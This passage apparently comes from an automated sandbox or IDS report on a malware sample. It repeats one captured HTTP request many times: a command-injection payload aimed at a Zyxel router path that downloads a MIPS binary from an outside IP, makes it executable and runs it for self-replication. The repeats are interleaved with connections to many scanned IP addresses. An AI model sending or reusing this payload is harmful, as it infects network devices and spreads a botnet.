          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: unknownTCP traffic detected without corresponding DNS query: 122.83.77.174
          Source: unknownTCP traffic detected without corresponding DNS query: 211.190.241.202
          Source: unknownTCP traffic detected without corresponding DNS query: 4.98.184.140
          Source: unknownTCP traffic detected without corresponding DNS query: 212.248.115.74
          Source: unknownTCP traffic detected without corresponding DNS query: 74.176.177.212
          Source: unknownTCP traffic detected without corresponding DNS query: 34.80.62.129
          Source: unknownTCP traffic detected without corresponding DNS query: 106.67.208.70
          Source: unknownTCP traffic detected without corresponding DNS query: 142.0.130.34
          Source: unknownTCP traffic detected without corresponding DNS query: 99.128.246.11
          Source: unknownTCP traffic detected without corresponding DNS query: 48.211.248.64
          Source: unknownTCP traffic detected without corresponding DNS query: 81.163.25.135
          Source: unknownTCP traffic detected without corresponding DNS query: 105.105.33.31
          Source: unknownTCP traffic detected without corresponding DNS query: 123.187.63.112
          Source: unknownTCP traffic detected without corresponding DNS query: 208.213.141.19
          Source: unknownTCP traffic detected without corresponding DNS query: 48.251.131.7
          Source: unknownTCP traffic detected without corresponding DNS query: 221.89.159.215
          Source: unknownTCP traffic detected without corresponding DNS query: 172.46.121.30
          Source: unknownTCP traffic detected without corresponding DNS query: 154.150.123.184
          Source: unknownTCP traffic detected without corresponding DNS query: 149.61.157.190
          Source: unknownTCP traffic detected without corresponding DNS query: 41.161.105.90
          Source: unknownTCP traffic detected without corresponding DNS query: 45.191.254.229
          Source: unknownTCP traffic detected without corresponding DNS query: 120.38.254.180
          Source: unknownTCP traffic detected without corresponding DNS query: 105.240.157.164
          Source: unknownTCP traffic detected without corresponding DNS query: 195.232.74.35
          Source: unknownTCP traffic detected without corresponding DNS query: 82.139.6.175
          Source: unknownTCP traffic detected without corresponding DNS query: 23.137.96.2
          Source: unknownTCP traffic detected without corresponding DNS query: 43.178.109.229
          Source: unknownTCP traffic detected without corresponding DNS query: 166.138.198.252
          Source: unknownTCP traffic detected without corresponding DNS query: 218.142.242.126
          Source: unknownTCP traffic detected without corresponding DNS query: 37.56.43.237
          Source: unknownTCP traffic detected without corresponding DNS query: 99.135.222.39
          Source: unknownTCP traffic detected without corresponding DNS query: 59.101.11.20
          Source: unknownTCP traffic detected without corresponding DNS query: 142.101.136.107
          Source: unknownTCP traffic detected without corresponding DNS query: 221.239.168.54
          Source: unknownTCP traffic detected without corresponding DNS query: 156.38.159.138
          Source: unknownTCP traffic detected without corresponding DNS query: 108.163.220.49
          Source: unknownTCP traffic detected without corresponding DNS query: 166.117.42.195
          Source: unknownTCP traffic detected without corresponding DNS query: 169.15.191.9
          Source: unknownTCP traffic detected without corresponding DNS query: 138.100.236.50
          Source: unknownTCP traffic detected without corresponding DNS query: 142.187.183.107
          Source: unknownTCP traffic detected without corresponding DNS query: 152.186.18.19
          Source: unknownTCP traffic detected without corresponding DNS query: 99.50.178.213
          Source: unknownTCP traffic detected without corresponding DNS query: 213.153.4.221
          Source: unknownTCP traffic detected without corresponding DNS query: 83.130.77.220
          Source: unknownTCP traffic detected without corresponding DNS query: 72.208.13.210
          Source: unknownTCP traffic detected without corresponding DNS query: 93.58.35.243
          Source: unknownTCP traffic detected without corresponding DNS query: 147.80.93.118
          Source: unknownTCP traffic detected without corresponding DNS query: 96.89.188.142
          Source: unknownTCP traffic detected without corresponding DNS query: 4.1.21.200
          Source: unknownTCP traffic detected without corresponding DNS query: 166.150.141.9
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
